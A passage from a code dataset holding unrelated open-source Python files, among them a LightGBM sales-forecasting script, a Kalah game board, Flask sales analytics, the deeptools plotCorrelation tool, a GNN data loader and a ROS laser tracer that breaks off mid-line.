0.04,\n \"sub_feature\" : 0.8,\n \"sub_row\" : 0.75,\n \"bagging_freq\" : 1,\n \"lambda_l2\" : 0.01,\n# \"nthread\" : 4\n 'verbosity': 1,\n 'num_iterations' : 2000,\n 'num_leaves': 384,\n \"min_data_in_leaf\": 128,\n #'min_child_weight': 5\n}\n\n\n\nm_lgb = lgb.train(params, train_data, \n valid_sets = [fake_valid_data],\n verbose_eval=20) \n\n\n\nmodel_name = 'lgb_model_tw12_lr004_n1200'\n\nm_lgb.save_model(\"lgb_models/\" + model_name + \".lgb\")\nprint('model saved')\n\n\n\n##############################################################################\n\nm_lgb = lgb.Booster(model_file=\"lgb_models/\" + model_name + \".lgb\")\nprint('model loaded')\n\n#alphas = [1.00]\n#weights = [1/len(alphas)]*len(alphas)\n#sub = 0.\n\n#for icount, (alpha, weight) in enumerate(zip(alphas, weights)):\n\ntemp_df = create_dt(is_train = False)\ncols = [f\"F{i}\" for i in range(1,29)]\n\nfor tdelta in range(0, 28):\n day = fday + timedelta(days=tdelta)\n print(tdelta, day)\n test_df = temp_df[(temp_df.date >= day - timedelta(days=max_lags)) & (temp_df.date <= day)].copy()\n create_fea(test_df)\n test_df = test_df.loc[test_df.date == day , train_cols]\n temp_df.loc[temp_df.date == day, \"sales\"] = m_lgb.predict(test_df) # magic multiplier by kyakovlev\n\n\nsub = temp_df.loc[temp_df.date >= fday, [\"id\", \"sales\"]].copy()\nsub_prev = temp_df.loc[temp_df.date.isin(fday_prev_list), [\"id\", \"sales\"]].copy()\n# te_sub.loc[te.date >= fday+ timedelta(days=h), \"id\"] = te_sub.loc[te.date >= fday+timedelta(days=h), \n# \"id\"].str.replace(\"validation$\", \"evaluation\")\ndef finalOutput(sub):\n sub[\"F\"] = [f\"F{rank}\" for rank in sub.groupby(\"id\")[\"id\"].cumcount()+1]\n sub = sub.set_index([\"id\", \"F\" ]).unstack()[\"sales\"][cols].reset_index()\n sub.fillna(0., inplace = True)\n sub.sort_values(\"id\", inplace = True)\n sub.reset_index(drop=True, inplace = True)\n sub.to_csv(f\"submission_{0}.csv\",index=False)\n return sub\n #if icount == 0 :\n # sub = te_sub\n # sub[cols] *= weight\n #else:\n # sub[cols] += te_sub[cols]*weight\n #print(icount, alpha, weight)\nsub_prev = finalOutput(sub_prev)\nsub = finalOutput(sub)\nsub_prev[\"id\"] = sub_prev[\"id\"].str.replace(\"evaluation$\", \"validation\")\nsub = pd.concat([sub_prev, sub], axis=0, sort=False)\nsub.to_csv(\"submission_new.csv\",index=False)\n#sub2 = sub.copy()\n#sub2[\"id\"] = sub2[\"id\"].str.replace(\"validation$\", \"evaluation\")\n#sub = pd.concat([sub, sub2], axis=0, sort=False)\n#sub.to_csv(\"submission_new.csv\",index=False)\n\n\n","repo_name":"danqingpan/Kaggle","sub_path":"M5-sales-prediction/model training/model_training.py","file_name":"model_training.py","file_ext":"py","file_size_in_byte":9785,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"70758471260","text":"from abkalah import NORTH, SOUTH\n\nclass Board:\n def __init__(self, board = [7] * 7 + [0] + [7] * 7 + [0]):\n self.state = board\n\n def move(self, move, first_turn = False):\n moved_board = [ i for i in self.state ]\n\n player = NORTH if move < 7 else SOUTH\n opponent = NORTH if player == SOUTH else SOUTH\n\n next_player = opponent\n\n stones = moved_board[move]\n moved_board[move] = 0\n\n # game end check\n if not self.has_moves(player):\n if player == NORTH:\n for i in range(8, 15):\n moved_board[15] += moved_board[i]\n moved_board[i] = 0\n else:\n for i in range(0, 7):\n moved_board[7] += moved_board[i]\n moved_board[i] = 0\n \n return Board(moved_board), opponent\n\n while stones > 0:\n # update next move\n move = (move + 1) % 16\n\n # don't add to opponent's well\n if player == NORTH and move == 15:\n move = 0\n elif player == SOUTH and move == 7:\n move = 8\n \n moved_board[move] += 1\n stones -= 1\n \n # check if the previous bowl was empty and capture opponent's\n if moved_board[move] == 1:\n opposite_well = 14 - move\n\n if player == NORTH and move < 7 and moved_board[opposite_well] > 0:\n moved_board[7] += moved_board[opposite_well] + 1\n moved_board[opposite_well] = 0\n moved_board[move] = 0\n elif player == SOUTH and move > 7 and move != 15 and moved_board[opposite_well] > 0:\n moved_board[15] += moved_board[opposite_well] + 1\n moved_board[opposite_well] = 0\n moved_board[move] = 0\n\n # check if stone was placed inside the player's own well\n if not first_turn and ((player == NORTH and move == 7) or (player == SOUTH and move == 15)):\n next_player = player\n \n return Board(moved_board), next_player\n\n def has_moves(self, player):\n if player == NORTH:\n for i in range(0,7):\n if self.state[i] > 0:\n return True\n else:\n for i in range(8, 15):\n if self.state[i] > 0:\n return True\n\n return False\n\n def available_moves(self, player):\n moves = []\n\n if player == NORTH:\n for i in range(0,7):\n if self.state[i] > 0:\n moves.append(i)\n else:\n for i in range(8, 15):\n if self.state[i] > 0:\n moves.append(i)\n\n return moves\n \n def is_end(self, player):\n if player == NORTH:\n for i in range(0, 7):\n if self.state[i] > 0: return False\n\n else:\n for i in range(8, 15):\n if self.state[i] > 0: return False\n\n return True\n\n def count_stones(self, player):\n sum = 0\n\n if player == NORTH:\n for i in range(0, 8):\n sum += self.state[i]\n else:\n for i in range(8, 16):\n sum += self.state[i]\n\n return sum\n\n def get_free_turns_for_player(self, player):\n count = 0\n\n if player == NORTH:\n for i in range(0, 7):\n if self.state[i] == (7 - i):\n count += 1\n else:\n for i in range(8, 15):\n if self.state[i] == (15 - i):\n count += 1\n\n return count\n \n def __str__(self):\n return str([ self.state[0:7], self.state[7], self.state[8:15], self.state[15] ])\n","repo_name":"jevvk/ai-coursework","sub_path":"abkalah/game/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":3176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"21706292359","text":"from flask_package.models import Inventory, Sales, Transaction\n# from datetime import date, datetime, timedelta\nimport datetime\nfrom dateutil.relativedelta import relativedelta\n\n\ndef t_income():\n income = 0\n all_sales = Sales.query.all()\n for sale in all_sales:\n income += sale.t_price\n return income\n\n\ndef t_investment():\n investment = 0\n all_inv = Inventory.query.all()\n for inv in all_inv:\n investment += inv.t_price\n return investment\n\n\ndef t_inv_remaining():\n remaining = 0\n all_inv = Inventory.query.filter(Inventory.remaining > 0).order_by(Inventory.id.desc())\n for inv in all_inv:\n remaining += inv.remaining\n return remaining\n\n\ndef remain_cash():\n cash_out = 0\n transactions = Transaction.query.all()\n for trans in transactions:\n cash_out += trans.amount\n cash = t_income() - cash_out\n return cash\n\n\ndef operation_cost():\n cost = 0\n transactions = Transaction.query.filter_by(type=2).all()\n for trans in transactions:\n cost += trans.amount\n return cost\n\n\ndef trans_type_one():\n cost = 0\n transactions = Transaction.query.filter_by(type=1).all()\n for trans in transactions:\n cost += trans.amount\n return cost\n\n\ndef PL():\n return t_income() - t_investment() - operation_cost()\n\n\ndef month_sale(x,y=0):\n day = datetime.datetime.now().day\n if x != 0:\n date1 = datetime.datetime.combine(datetime.date.today() - relativedelta(months=x, days=day),\n datetime.time(0, 0))\n\n date2 = datetime.datetime.combine(datetime.date.today() - relativedelta(months=y,days=day),\n datetime.time(0, 0))\n else:\n date1 = datetime.datetime.combine(datetime.date.today() - relativedelta(months=x, days=day),\n datetime.time(0, 0))\n\n date2 = datetime.datetime.combine(datetime.date.today(),\n datetime.time(0, 0))\n\n # print(date1, date2)\n trans = Sales.query.filter(Sales.date > date1).filter(Sales.date <= date2)\n return trans\n\n\ndef month_income(x, y):\n income = 0\n sales = month_sale(x, y)\n for sale in sales:\n income += sale.t_price\n return income\n\n\ndef month_trans(x):\n day = datetime.datetime.now().day\n if x != 0:\n date1 = datetime.datetime.combine(datetime.date.today() - relativedelta(months=x, days=day),\n datetime.time(0, 0))\n\n date2 = datetime.datetime.combine(datetime.date.today() - relativedelta(days=day),\n datetime.time(0, 0))\n else:\n date1 = datetime.datetime.combine(datetime.date.today() - relativedelta(months=x, days=day),\n datetime.time(0, 0))\n\n date2 = datetime.datetime.combine(datetime.date.today(),\n datetime.time(0, 0))\n\n # print(date1, date2)\n trans = Transaction.query.filter(Sales.date > date1).filter(Sales.date <= date2)\n return trans\n\n\ndef month_trans_amount(x):\n amount = 0\n transactions = month_trans(x)\n for trans in transactions:\n amount += trans.amount\n return amount\n\n\ndef month_inv(x, y):\n day = datetime.datetime.now().day\n if x != 0:\n date1 = datetime.datetime.combine(datetime.date.today() - relativedelta(months=x, days=day),\n datetime.time(0, 0))\n\n date2 = datetime.datetime.combine(datetime.date.today() - relativedelta(months=y, days=day),\n datetime.time(0, 0))\n else:\n\n date1 = datetime.datetime.combine(datetime.date.today() - relativedelta(months=x, days=day),\n datetime.time(0, 0))\n\n date2 = datetime.datetime.combine(datetime.date.today(),\n datetime.time(0, 0))\n\n # print(date1, date2)\n trans = Inventory.query.filter(Inventory.date > date1).filter(Inventory.date <= date2)\n return trans\n\n\ndef month_inv_amount(x, y):\n amount = 0\n investment = month_inv(x, y)\n\n for inv in investment:\n amount += inv.t_price\n # print(x, y, amount)\n return amount\n\n\n","repo_name":"LongZhai/flask","sub_path":"flask_package/d_analysis.py","file_name":"d_analysis.py","file_ext":"py","file_size_in_byte":4288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"22402496693","text":"import torch\nfrom torch.utils.data import DataLoader,Dataset\n\n\n\nclass Vocabulary:\n def __init__(self):\n self.freeze = False\n self.word2index = {}\n self.index2word = {}\n self.dict_size = 0\n\n @property\n def dict_size_(self):\n return self.dict_size\n\n def index(self, word):\n if not self.freeze:\n if word in self.word2index:\n return self.word2index[word]\n else:\n self.word2index[word] = self.dict_size\n self.index2word[self.dict_size] = word\n self.dict_size += 1\n return self.word2index[word]\n else:\n if word in self.word2index:\n return self.word2index[word]\n else:\n raise ValueError('Word is not in this dictionary ! ')\n\n def word(self, index):\n assert index < self.dict_size and index >= 0, f\"index is out of the dict_size({self.dict_size})\"\n return self.index2word[index]\n\n\n def freeze_(self):\n self.freeze = True\n\nclass MyDataset(Dataset):\n def __init__(self,text,vocab):\n super(MyDataset, self).__init__()\n self.vocab = vocab\n self.text = text\n self.enc_input,self.dec_input,self.dec_output = self.get_index(text)\n\n def __len__(self):\n return len(self.text)\n\n def __getitem__(self, item):\n return self.enc_input[item],self.dec_input[item],self.dec_output[item]\n\n\n def get_index(self,text):\n enc_inputs,dec_inputs,dec_outputs = [],[],[]\n for sentences in text:\n enc_input = [[ self.vocab.index(w) for w in sentences[0].split(' ')]]\n dec_input = [[ self.vocab.index(w) for w in sentences[1].split(' ')]]\n dec_output = [[ self.vocab.index(w) for w in sentences[2].split(' ')]]\n\n enc_inputs.extend(enc_input)\n dec_inputs.extend(dec_input)\n dec_outputs.extend(dec_output)\n\n return torch.LongTensor(enc_inputs),torch.LongTensor(dec_inputs),torch.LongTensor(dec_outputs)\n\n\n\n\n# only for test\n\n# S: Symbol that shows starting of decoding input\n# E: Symbol that shows starting of decoding output\n# P: Symbol that will fill in blank sequence if current batch data size is short than time steps\n# dec_input is the shifted right dec_output\nsentences = [\n # enc_input dec_input dec_output\n ['ich mochte ein bier P', 'S i want a beer .', 'i want a beer . E'],\n ['ich mochte ein cola P', 'S i want a coke .', 'i want a coke . E']\n]\n\n\n# create the dictionary\nvocabulary = Vocabulary()\nvocabulary.index('P') #Padding should be zero\nvocabulary.index('S')\nvocabulary.index('E')\n\nfor sen in sentences:\n for s in sen:\n for word in s.split(' '):\n vocabulary.index(word)\n\nvocabulary.freeze_()\n\ndataset = MyDataset(text=sentences,vocab=vocabulary)\ndataloader = DataLoader(dataset,batch_size=2,drop_last=False)\n\n","repo_name":"leaves520/NLP-practice","sub_path":"Transformer/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2926,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"69"}
+{"seq_id":"73624707739","text":"from itertools import chain\nfrom string import ascii_lowercase, ascii_uppercase\n\ndef into_rucksacks(contents):\n middle = len(contents) // 2\n return (contents[:middle], contents[middle:])\n\ndef find_common_item(xs, ys):\n for x in xs:\n for y in ys:\n if x == y:\n return x\n\n# dictionary mapping a letter to its assigned priority\npriority_by_letter = dict(map(reversed, enumerate(chain(ascii_lowercase, ascii_uppercase), start=1)))\n\nwith open(\"input.txt\") as f:\n data = f.readlines()\n\nrucksacks = map(into_rucksacks, data)\ncommon_items = [find_common_item(xs, ys) for (xs, ys) in rucksacks]\npriorities = map(priority_by_letter.get, common_items)\npriority_sum = sum(priorities)\nprint(priority_sum)\n","repo_name":"dmarku/advent-of-code-2022","sub_path":"day-03/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"15858678896","text":"import urlparse\nimport re\n\n\nclass AramaMotorlariMiddleware( object ):\n\t\"\"\"\n\trequest.search_referrer_engine\n\trequest.search_referrer_domain\n\trequest.search_referrer_term\n\n\tUsage example:\n\t==============\n\tShow ads only to visitors coming from a searh engine\n\n\t{% if request.search_referrer_engine %}\n\t\thtml for ads...\n\t{% endif %}\n\t\"\"\"\n\tSEARCH_PARAMS = { 'AltaVista': 'q', 'Ask': 'q', 'Google': 'q', 'Live': 'q', 'Lycos': 'query', 'MSN': 'q', 'Yahoo': 'p', 'Cuil': 'q', }\n\n\tNETWORK_RE = r\"\"\"^\n (?P[-.a-z\\d]+\\.)?\n (?P%s)\n (?P(?:\\.[a-z]{2,3}){1,2})\n (?P:\\d+)?\n $(?ix)\"\"\"\n\n\n\n\t@classmethod\n\tdef parse_search( cls, url ):\n\t\ttry:\n\t\t\tparsed = urlparse.urlsplit( url )\n\t\t\tnetwork = parsed[1]\n\t\t\tquery = parsed[3]\n\t\texcept (AttributeError, IndexError):\n\t\t\treturn (None, None, None)\n\t\tfor engine, param in cls.SEARCH_PARAMS.iteritems( ):\n\t\t\tmatch = re.match( cls.NETWORK_RE % engine, network )\n\t\t\tif match and match.group( 2 ):\n\t\t\t\tterm = urlparse.parse_qs( query ).get( param )\n\t\t\t\tif term and term[0]:\n\t\t\t\t\tterm = ' '.join( term[0].split( ) ).lower( )\n\t\t\t\t\treturn (engine, network, term)\n\t\treturn (None, network, None)\n\n\n\n\tdef process_request( self, request ):\n\t\treferrer = request.META.get( 'HTTP_REFERER' )\n\t\tengine, domain, term = self.parse_search( referrer )\n\t\trequest.search_referrer_engine = engine\n\t\trequest.search_referrer_domain = domain\n\t\trequest.search_referrer_term = term\n","repo_name":"muslu/teslabb","sub_path":"kategoriler/aramamotorlari.py","file_name":"aramamotorlari.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"36783578270","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nimport argparse\nimport numpy as np\nimport matplotlib\nmatplotlib.use('Agg')\nmatplotlib.rcParams['pdf.fonttype'] = 42\nmatplotlib.rcParams['svg.fonttype'] = 'none'\nfrom deeptools import cm # noqa: F401\nimport matplotlib.pyplot as plt\n\nfrom deeptools.correlation import Correlation\nfrom deeptools.parserCommon import writableFile\ntry: # keep python 3.7 support.\n from importlib.metadata import version\nexcept ModuleNotFoundError:\n from importlib_metadata import version\n\nold_settings = np.seterr(all='ignore')\n\n\ndef parse_arguments(args=None):\n basic_args = plot_correlation_args()\n heatmap_parser = heatmap_options()\n scatter_parser = scatterplot_options()\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description=\"\"\"\nTool for the analysis and visualization of sample correlations based on the output of multiBamSummary or\nmultiBigwigSummary. Pearson or Spearman methods are available to compute correlation\ncoefficients. Results can be saved as multiple\nscatter plots depicting the pairwise correlations or as a clustered heatmap,\nwhere the colors represent the correlation coefficients and the clusters are constructed using complete linkage.\nOptionally, the values can be saved as tables, too.\n\n\ndetailed help:\n\n plotCorrelation -h\n\n\"\"\",\n epilog='example usages:\\n'\n 'plotCorrelation -in results_file --whatToPlot heatmap --corMethod pearson -o heatmap.png\\n\\n'\n ' \\n\\n',\n parents=[basic_args, heatmap_parser, scatter_parser],\n usage='plotCorrelation -in matrix.gz -c spearman -p heatmap -o plot.png\\n'\n 'help: plotCorrelation -h / plotCorrelation --help\\n')\n\n return parser\n\n\ndef plot_correlation_args():\n parser = argparse.ArgumentParser(add_help=False)\n required = parser.add_argument_group('Required arguments')\n\n # define the arguments\n required.add_argument('--corData', '-in',\n metavar='FILE',\n help='Compressed matrix of values generated by multiBigwigSummary or multiBamSummary',\n required=True)\n\n required.add_argument('--corMethod', '-c',\n help=\"Correlation method.\",\n choices=['spearman', 'pearson'],\n required=True)\n\n required.add_argument('--whatToPlot', '-p',\n help=\"Choose between a heatmap or pairwise scatter plots\",\n choices=['heatmap', 'scatterplot'],\n required=True)\n\n optional = parser.add_argument_group('Optional arguments')\n optional.add_argument('--plotFile', '-o',\n help='File to save the heatmap to. The file extension determines the format, '\n 'so heatmap.pdf will save the heatmap in PDF format. '\n 'The available formats are: .png, '\n '.eps, .pdf and .svg.',\n type=writableFile,\n metavar='FILE')\n\n optional.add_argument('--skipZeros',\n help='By setting this option, genomic regions '\n 'that have zero or missing (nan) values in all samples '\n 'are excluded.',\n action='store_true',\n required=False)\n\n optional.add_argument('--labels', '-l',\n metavar='sample1 sample2',\n help='User defined labels instead of default labels from '\n 'file names. '\n 'Multiple labels have to be separated by spaces, e.g. '\n '--labels sample1 sample2 sample3',\n nargs='+')\n\n optional.add_argument('--plotTitle', '-T',\n help='Title of the plot, to be printed on top of '\n 'the generated image. Leave blank for no title. (Default: %(default)s)',\n default='')\n\n optional.add_argument('--plotFileFormat',\n metavar='FILETYPE',\n help='Image format type. If given, this option '\n 'overrides the image format based on the plotFile '\n 'ending. The available options are: png, '\n 'eps, pdf and svg.',\n choices=['png', 'pdf', 'svg', 'eps', 'plotly'])\n\n optional.add_argument(\n '--removeOutliers',\n help='If set, bins with very large counts are removed. '\n 'Bins with abnormally high reads counts artificially increase '\n 'pearson correlation; that\\'s why, multiBamSummary tries '\n 'to remove outliers using the median absolute deviation (MAD) '\n 'method applying a threshold of 200 to only consider extremely '\n 'large deviations from the median. The ENCODE blacklist page '\n '(https://sites.google.com/site/anshulkundaje/projects/blacklists) '\n 'contains useful information about regions with unusually high counts'\n 'that may be worth removing.',\n action='store_true')\n\n optional.add_argument('--version', action='version',\n version='%(prog)s {}'.format(version('deeptools')))\n\n group = parser.add_argument_group('Output optional options')\n\n group.add_argument('--outFileCorMatrix',\n help='Save matrix with pairwise correlation values to a tab-separated file.',\n metavar='FILE',\n type=writableFile)\n\n return parser\n\n\ndef scatterplot_options():\n \"\"\"\n Options specific for creating the scatter plot\n \"\"\"\n parser = argparse.ArgumentParser(add_help=False)\n scatter_opts = parser.add_argument_group('Scatter plot options')\n\n scatter_opts.add_argument('--xRange',\n help='The X axis range. The default scales these such that the full range of dots is displayed.',\n type=int,\n nargs=2,\n default=None)\n\n scatter_opts.add_argument('--yRange',\n help='The Y axis range. The default scales these such that the full range of dots is displayed.',\n type=int,\n nargs=2,\n default=None)\n\n scatter_opts.add_argument('--log1p',\n help='Plot the natural log of the scatter plot after adding 1. Note that this is ONLY for plotting, the correlation is unaffected.',\n action='store_true')\n\n return parser\n\n\ndef heatmap_options():\n \"\"\"\n Options for generating the correlation heatmap\n \"\"\"\n parser = argparse.ArgumentParser(add_help=False)\n heatmap = parser.add_argument_group('Heatmap options')\n\n heatmap.add_argument('--plotHeight',\n help='Plot height in cm. (Default: %(default)s)',\n type=float,\n default=9.5)\n\n heatmap.add_argument('--plotWidth',\n help='Plot width in cm. The minimum value is 1 cm. (Default: %(default)s)',\n type=float,\n default=11)\n\n heatmap.add_argument('--zMin', '-min',\n default=None,\n help='Minimum value for the heatmap intensities. '\n 'If not specified, the value is set automatically',\n type=float)\n\n heatmap.add_argument('--zMax', '-max',\n default=None,\n help='Maximum value for the heatmap intensities.'\n 'If not specified, the value is set automatically',\n type=float)\n\n heatmap.add_argument(\n '--colorMap', default='jet',\n metavar='',\n help='Color map to use for the heatmap. Available values can be '\n 'seen here: '\n 'http://matplotlib.org/examples/color/colormaps_reference.html')\n\n heatmap.add_argument('--plotNumbers',\n help='If set, then the correlation number is plotted '\n 'on top of the heatmap. This option is only valid when plotting a heatmap.',\n action='store_true',\n required=False)\n\n return parser\n\n\ndef main(args=None):\n\n args = parse_arguments().parse_args(args)\n\n if args.plotFile is None and args.outFileCorMatrix is None:\n sys.exit(\"At least one of --plotFile and --outFileCorMatrix must be specified!\\n\")\n\n corr = Correlation(args.corData,\n args.corMethod,\n labels=args.labels,\n remove_outliers=args.removeOutliers,\n skip_zeros=args.skipZeros)\n\n if args.corMethod == 'pearson':\n # test if there are outliers and write a message recommending the removal\n if len(corr.get_outlier_indices(np.asarray(corr.matrix).flatten())) > 0:\n if args.removeOutliers:\n sys.stderr.write(\"\\nOutliers were detected in the data. They \"\n \"will be removed to avoid bias \"\n \"in the pearson correlation.\\n\")\n\n else:\n sys.stderr.write(\"\\nOutliers were detected in the data. Consider \"\n \"using the --removeOutliers parameter to avoid a bias \"\n \"in the pearson correlation.\\n\")\n\n if args.colorMap:\n try:\n plt.get_cmap(args.colorMap)\n except ValueError as error:\n sys.stderr.write(\n \"A problem was found. Message: {}\\n\".format(error))\n exit()\n\n if args.plotFile is not None:\n if args.whatToPlot == 'scatterplot':\n corr.plot_scatter(args.plotFile,\n plot_title=args.plotTitle,\n image_format=args.plotFileFormat,\n xRange=args.xRange,\n yRange=args.yRange,\n log1p=args.log1p)\n else:\n corr.plot_correlation(args.plotFile,\n vmax=args.zMax,\n vmin=args.zMin,\n colormap=args.colorMap,\n plot_title=args.plotTitle,\n image_format=args.plotFileFormat,\n plot_numbers=args.plotNumbers,\n plotWidth=args.plotWidth,\n plotHeight=args.plotHeight)\n\n if args.outFileCorMatrix:\n o = open(args.outFileCorMatrix, \"w\")\n o.write(\"#plotCorrelation --outFileCorMatrix\\n\")\n corr.save_corr_matrix(o)\n o.close()\n","repo_name":"deeptools/deepTools","sub_path":"deeptools/plotCorrelation.py","file_name":"plotCorrelation.py","file_ext":"py","file_size_in_byte":11093,"program_lang":"python","lang":"en","doc_type":"code","stars":615,"dataset":"github-code","pt":"69"}
+{"seq_id":"3996696191","text":"# https://atcoder.jp/contests/kupc2012pr/tasks/kupc2012pr_1\r\n\r\nimport sys\r\nsys.setrecursionlimit(10**6)\r\n\r\nm, n = map(int, input().split())\r\n\r\ndef a(m, n):\r\n \"\"\"\r\n アッカーマン関数\r\n m <= 3, n <= 60\r\n \"\"\"\r\n if m == 0:\r\n return n + 1\r\n if m == 1:\r\n return n + 2\r\n if m == 2:\r\n return 2*n + 3\r\n if m == 3:\r\n return pow(2, n+3) - 3\r\n\r\nprint(a(m, n))\r\n","repo_name":"Hironobu-Kawaguchi/atcoder","sub_path":"atcoder/kupc2012pr_1.py","file_name":"kupc2012pr_1.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"7498694265","text":"import sys\nfrom collections import namedtuple\nimport dgl\nimport torch\nimport torch.nn.functional as F\n\ndef getSettings(dataset_name,data=\"\"):\n\n config=dict()\n config['epoch'] = 100\n\n if (dataset_name == 'karate'):\n config['dataset_name'] = 'karate'\n config['labeled_only'] = True\n\n config['input_features'] = 34\n config['dropout'] = [0, 0]\n config['hidden_neurons'] = [10,10]\n config['out_features'] = 2\n config['batch_size'] = 5\n config['activation'] = F.relu\n config['learning_rate'] = 1e-2\n\n\n elif (dataset_name == 'CVE'):\n config['dataset_name'] = 'CVE'\n config['labeled_only'] = False\n config['input_features'] = 1000 #12432\n config['dropout'] = [0.5, 0.0, 0.0]\n config['hidden_neurons'] = [512,256]\n config['out_features'] = 11\n\n config['batch_size'] = 128\n config['epoch']=50\n config['activation']=F.relu\n config['learning_rate']=1e-3\n\n elif (dataset_name == 'imdb'):\n config['dataset_name'] = 'karate'\n config['labeled_only'] = True\n\n config['input_features'] = data.x.shape[1]\n config['dropout'] = [0, 0]\n config['hidden_neurons'] = [100,100]\n config['out_features'] = len(data.classname)\n config['batch_size'] = 32\n config['activation'] = F.relu\n config['learning_rate'] = 1e-2\n\n else:\n print('Dataset not found')\n sys.exit(0)\n\n return config\n\ndef get_dataset(config):\n if (config['dataset_name'] == 'CVE'):\n from Dataset.CVE_Dataset import data_G\n dataset = data_G(config['input_path'],config['labeled_only']) # true for labeled only dataset\n elif (config['dataset_name'] == 'karate'):\n from Dataset.Karate_Dataset import data_G_karate\n dataset = data_G_karate(config['input_path'])\n elif (config['dataset_name'] == 'imdb'):\n from Dataset.Imdb_read import data_G_imdb\n dataset = data_G_imdb(config)\n else:\n sys.exit(0)\n\n return dataset\n\ndef load_data(config):\n dataset=get_dataset(config)\n\n x=torch.tensor(dataset.Feature,dtype=torch.float)\n y=torch.tensor(dataset.Label,dtype=torch.long)\n G=dataset.Graph\n edges=G.edges()\n\n u = [src for src,dst in edges]\n v = [dst for src, dst in edges]\n\n try:\n if(config['directed']):\n tmp_u=list(u)\n u.extend(v)\n v.extend(tmp_u)\n except:\n print(\"Considering undirected graph\")\n\n train_index=torch.tensor(dataset.train_index,dtype=torch.long)\n test_index=torch.tensor(dataset.test_index,dtype=torch.long)\n val_index=torch.tensor(dataset.val_index,dtype=torch.long)\n\n edge_index=torch.tensor([u,v],dtype=torch.long)\n Dataset = namedtuple('Dataset', field_names=['x', 'y', 'edge_index', 'train_index', 'test_index', 'val_index','classname'])\n data=Dataset(x=x,y=y,edge_index=edge_index,train_index=train_index,test_index=test_index,val_index=val_index,classname=dataset.classname)\n\n return data\n\ndef load_data_DGL(config):\n dataset = get_dataset(config)\n\n x = torch.tensor(dataset.Feature, dtype=torch.float)\n y = torch.tensor(dataset.Label, dtype=torch.long)\n\n G = dgl.DGLGraph()\n G.from_networkx(dataset.Graph)\n\n\n train_index = torch.tensor(dataset.train_index, dtype=torch.long)\n test_index = torch.tensor(dataset.test_index, dtype=torch.long)\n val_index = torch.tensor(dataset.val_index, dtype=torch.long)\n\n Dataset = namedtuple('Dataset', field_names=['x', 'y', 'Graph', 'train_index', 'test_index', 'val_index','classname'])\n\n data = Dataset(x=x, y=y, Graph=G, train_index=train_index, test_index=test_index, val_index=val_index,classname=dataset.classname)\n\n return data\n\nif __name__ == '__main__':\n config=getSettings('karate')\n config['input_path']='/Users/siddharthashankardas/Purdue/Dataset/Karate/'\n data=load_data(config)\n\n print(data)","repo_name":"siddhartha047/GSSLEmbedding","sub_path":"GNN_configuration.py","file_name":"GNN_configuration.py","file_ext":"py","file_size_in_byte":3929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"41577058668","text":"import csv\nfrom ff_graph_views import *\n\n\ndef main():\n data = {}\n\n with open(\"ff_reddit_contest_data.csv\", 'r') as f:\n reader = csv.reader(f)\n for line in reader:\n # Ignore header line\n if line[0] == \"Game\":\n continue\n\n key = line[0]\n data[key] = []\n\n for cell in line[1:]:\n if cell == '':\n break\n data[key].append(int(cell))\n\n plot_percentages(data)\n plot_votes(data)\n plot_votes(data, log=True)\n\n bar_percentage(data)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"johnsbuck/Final-Fantasy-Elminination-Rounds-Data-Analysis","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"25888034477","text":"\nfrom django.conf.urls import url\n\n\nfrom .views import (\n\n ItemCreateView,\n ItemListView,\n ItemDetailView,\n ItemUpdateView,\n)\nurlpatterns = [\n \n url(r'^create/$',ItemCreateView.as_view(), name='create' ),# restaurant_createview\n #url(r'^(?P\\d+)/edit/$', ItemUpdateView.as_view(),name='update'),\n url(r'^(?P\\d+)/$', ItemUpdateView.as_view(),name='detail'),\n url(r'^$', ItemListView.as_view(),name='list'),\n \n\n]\n","repo_name":"User9000/new-try_django11","sub_path":"menus/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"4381449576","text":"#!/usr/bin/env python\n\nimport rospy\nfrom laser_assembler.srv import *\nfrom furniture_estimator.match import *\nimport tf\nimport yaml\nimport sys\nimport os\n\nclass Tracer:\n def __init__(self):\n self.model = rospy.get_param('~model')\n self.name = rospy.get_param('~name')\n\n self.br = tf.TransformBroadcaster()\n rospy.wait_for_service(\"assemble_scans\")\n self.assemble_scans = rospy.ServiceProxy('assemble_scans', AssembleScans)\n\n self.pose = rospy.get_param('~seed', [0,0,0])\n\n def estimate(self):\n resp = self.assemble_scans(rospy.Time(0,0), rospy.get_rostime())\n self.base_frame = resp.cloud.header.frame_id\n c2 = to_list(resp.cloud.points)\n\n cloud = filter_cloud(c2, self.pose)\n if cloud is None or len(cloud)==0:\n return None\n return find_best_transform(self.model, cloud, self.pose)\n \n def spin(self):\n r = rospy.Rate(20)\n while not rospy.is_shutdown():\n estimate = self.estimate()\n if estimate is not None:\n self.pose = estimate\n self.br.sendTransform((self.pose[0], self.pose[1], 0),\n tf.transformations.quaternion_from_euler(0, 0, self.pose[2]),\n rospy.Time.now(),\n self.name,\n self.base_frame)\n r.sleep()\n\nrospy.init_node('laser_tracer')\nfor arg in sys.argv[1:]:\n if 'yaml' in arg:\n model = yaml.load(open(arg))\n rospy.set_param('~model', model)\n name = 